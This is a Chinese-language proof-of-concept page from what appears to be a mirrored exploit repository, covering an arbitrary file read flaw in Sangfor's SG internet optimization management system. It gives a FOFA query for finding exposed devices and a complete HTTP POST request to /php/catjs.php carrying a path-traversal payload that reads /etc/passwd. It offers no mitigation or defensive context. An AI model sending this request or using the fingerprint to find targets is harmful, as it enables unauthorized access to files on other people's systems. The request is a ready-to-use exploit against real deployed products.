admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/深信服/深信服SG上网优化管理系统/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md

33 lines
1.5 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 深信服SG上网优化管理系统catjs存在任意文件读取漏洞
# 一、漏洞简介
SANGFOR上网优化管理系统是一款集上网行为管理、网络准入、设备准入以及业务访问行为分析于一体的安全产品。核心优势多种认证方式、全面的审计能力、支持多种应用的封堵、*的流量控制准确识别iot设备、统一管理硬件资产强管控违规用户精细分析行为画像部署实施简单维护成本低。全网行为管理基于端点无感知、少故障节点、不影响原有网络为原则的产品设计理念致力于给客户带来更好的使用体验。深信服SG上网优化管理系统catjs存在任意文件读取漏洞
# 二、影响版本
+ 深信服SG上网优化管理系统
# 三、资产测绘
+ fofa`title="SANGFOR上网优化管理"`
+ 特征
![1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38.png](./img/tVIicowd7O9vW7DB/1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38-221870.png)
# 四、漏洞复现
```plain
POST /php/catjs.php HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
["../../../../../../../etc/passwd"]
```
![1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa.png](./img/tVIicowd7O9vW7DB/1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa-365869.png)
> 更新: 2024-04-19 08:49:27
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zn0vntfcl2txn765>
Reference in New Issue Copy Permalink